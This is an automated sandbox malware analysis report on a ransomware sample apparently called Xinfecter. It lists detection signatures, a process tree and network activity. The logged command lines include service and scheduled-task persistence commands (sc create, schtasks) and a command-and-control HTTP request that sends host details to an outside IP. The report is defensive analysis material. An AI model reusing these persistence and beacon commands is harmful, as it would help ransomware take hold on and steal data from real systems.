
Windows Analysis Report
BiXS3FRoLe.exe

Overview

General Information

Sample name: BiXS3FRoLe.exe (renamed because original name is a hash value)
Original sample name: 1e89b482a11bdda467322cca6a8a06621fc834587bfeb682cda22ee93885fe84.exe
Analysis ID: 1569984
MD5: 8f807535948b5e93317baf48a4d0e69d
SHA1: 9c3a19d95ebd7d43cc37437237fbc75ebd541bf0
SHA256: 1e89b482a11bdda467322cca6a8a06621fc834587bfeb682cda22ee93885fe84
Tags: exe, user-JAMESWT_MHT

Detection

TrojanRansom
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected TrojanRansom
AI detected suspicious sample
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to clear event logs
Deletes shadow drive data (may be related to ransomware)
Drops PE files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Sigma detected: Suspicious New Service Creation
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • BiXS3FRoLe.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\BiXS3FRoLe.exe" MD5: 8F807535948B5E93317BAF48A4D0E69D)
    • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7456 cmdline: C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • tasklist.exe (PID: 7472 cmdline: tasklist /v /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7480 cmdline: findstr /i "dcdcf" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 7864 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 7884 cmdline: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 7916 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 7932 cmdline: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 7948 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 7964 cmdline: sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 7980 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 7996 cmdline: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wscript.exe (PID: 8036 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 8156 cmdline: C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2524 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7260 cmdline: tasklist /v MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 7316 cmdline: find /I /c "dcdcf" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 7480 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 7356 cmdline: tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 7216 cmdline: find /I "BiXS3FRoLe.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 2088 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 5632 cmdline: tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 7472 cmdline: find /I "BiXS3FRoLe.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 7992 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 8096 cmdline: tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 7488 cmdline: find /I "BiXS3FRoLe.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 7544 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 3096 cmdline: tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 656 cmdline: find /I "BiXS3FRoLe.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 8072 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • schtasks.exe (PID: 8092 cmdline: schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 8116 cmdline: C:\Windows\system32\cmd.exe /c echo %date%-%time% MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 8132 cmdline: C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • systeminfo.exe (PID: 8148 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
      • find.exe (PID: 8164 cmdline: find /i "os name" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 7252 cmdline: C:\Windows\system32\cmd.exe /c systeminfo|find /i "original" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • systeminfo.exe (PID: 6944 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
      • find.exe (PID: 1732 cmdline: find /i "original" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 7500 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • svchost.exe (PID: 7516 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Sgrmuserer.exe (PID: 7552 cmdline: C:\Windows\system32\Sgrmuserer.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 7588 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7616 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7724 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 8180 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5768 cmdline: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 1636 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • cmd.exe (PID: 7964 cmdline: C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8084 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5900 cmdline: tasklist /v MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • find.exe (PID: 6032 cmdline: find /I /c "dcdcf" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
  • Xinfecter.exe (PID: 8172 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" MD5: 8F807535948B5E93317BAF48A4D0E69D)
    • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: BiXS3FRoLe.exe PID: 7364 | JoeSecurity_TrojanRansom | Yara detected TrojanRansom | Joe Security |
Process Memory Space: Xinfecter.exe PID: 8172 | JoeSecurity_TrojanRansom | Yara detected TrojanRansom | Joe Security |

System Summary

Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\BiXS3FRoLe.exe, ProcessId: 7364, TargetFilename: C:\Users\user\AppData\S-6748.bat
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7864, ParentProcessName: cmd.exe, ProcessCommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ProcessId: 7884, ProcessName: sc.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7996, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , ProcessId: 8036, ProcessName: wscript.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\BiXS3FRoLe.exe, ProcessId: 7364, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7996, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , ProcessId: 8036, ProcessName: wscript.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7864, ParentProcessName: cmd.exe, ProcessCommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ProcessId: 7884, ProcessName: sc.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 7516, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T13:42:11.708896+0100 | 2045821 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49715 | 185.147.34.53 | 3586 | TCP


AV Detection

Source: BiXS3FRoLe.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Avira: detection malicious, Label: HEUR/AGEN.1353205
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | ReversingLabs: Detection: 84%
Source: BiXS3FRoLe.exe | ReversingLabs: Detection: 84%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Joe Sandbox ML: detected
Source: BiXS3FRoLe.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00AD4230 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,CryptAcquireContextA,___std_exception_copy,0_2_00AD4230
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00AD47F0 CryptReleaseContext,0_2_00AD47F0
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00AD4900 CryptGenRandom,CryptReleaseContext,__CxxThrowException@8,0_2_00AD4900
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00AD4390 CryptAcquireContextA,GetLastError,CryptReleaseContext,0_2_00AD4390
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00AD4720 CryptReleaseContext,0_2_00AD4720
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00AD4760 CryptGenRandom,__CxxThrowException@8,0_2_00AD4760
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00074230 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,CryptAcquireContextA,___std_exception_copy,48_2_00074230
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000747F0 CryptReleaseContext,48_2_000747F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00074900 CryptGenRandom,CryptReleaseContext,__CxxThrowException@8,48_2_00074900
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00074390 CryptAcquireContextA,GetLastError,CryptReleaseContext,48_2_00074390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00074720 CryptReleaseContext,48_2_00074720
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00074760 CryptGenRandom,__CxxThrowException@8,48_2_00074760
Source: BiXS3FRoLe.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: BiXS3FRoLe.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: z:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: x:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: v:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: t:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: r:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: p:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: n:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: l:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: j:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: h:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: f:
Source: C:\Windows\System32\svchost.exe | File opened: d:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: b:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: y:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: w:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: u:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: s:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: q:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: o:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: m:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: k:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: i:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: g:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: e:
Source: C:\Windows\System32\cmd.exe | File opened: c:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: a:
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A84500 NetUserEnum,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,0_2_00A84500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00024500 NetUserEnum,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,48_2_00024500
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A88240 SetErrorMode,FindFirstFileW,0_2_00A88240
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A88380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,0_2_00A88380
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A89ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,0_2_00A89ABA
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A8AF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,0_2_00A8AF50
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B3BA6B FindFirstFileExA,0_2_00B3BA6B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00028240 SetErrorMode,FindFirstFileW,48_2_00028240
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00028380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,48_2_00028380
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_0002AF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,48_2_0002AF50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000DBA6B FindFirstFileExA,48_2_000DBA6B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00029ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,48_2_00029ABA
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A8D950 GetLogicalDriveStringsA,0_2_00A8D950

Networking

Source: Network traffic | Suricata IDS: 2045821 - Severity 1 - ET MALWARE [ANY.RUN] RCRU64 Ransomware Variant CnC Activity : 192.168.2.10:49715 -> 185.147.34.53:3586
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 3586
Source: global traffic | TCP traffic: 192.168.2.10:49715 -> 185.147.34.53:3586
Source: global traffic | HTTP traffic detected: GET /110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]_____03/10/2023,_10:57:18$_06/12/2024-_7:42:[Version_10.0.19045.2006|Microsoft_Windows_10_Prohg3l,8.46.123.228~[...]&21L0I*7.999268(2)2,d5Evo.team1992@gmail.com HTTP/1.1 Host: 185.147.34.53 Connection: close
Source: Joe Sandbox View | IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View | IP Address: 185.147.34.53 185.147.34.53
Source: Joe Sandbox View | ASN Name: HOSTSLIM-GLOBAL-NETWORKNL HOSTSLIM-GLOBAL-NETWORKNL
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | TCP traffic detected without corresponding DNS query: 185.147.34.53
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A78CB0 std::locale::_Init,WSAStartup,socket,gethostbyname,htons,connect,send,recv,recv,closesocket,WSACleanup,0_2_00A78CB0
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Accept: text/* User-Agent: YourUserAgent Host: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org
Source: BiXS3FRoLe.exe, 00000000.00000002.2503580325.0000000000769000.00000004.00000010.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/
Source: BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/)
Source: BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/E
      Source: svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
      Source: svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
